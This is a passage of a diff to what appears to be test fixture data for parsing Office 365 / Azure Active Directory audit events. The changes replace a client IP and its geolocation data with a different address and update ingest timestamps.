APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124885800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -2231,25 +2033,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2263,7 +2047,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -2399,7 +2183,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -2411,12 +2195,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036131200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124892700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -2442,25 +2226,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2474,7 +2240,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -2610,7 +2376,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -2622,12 +2388,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036141100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID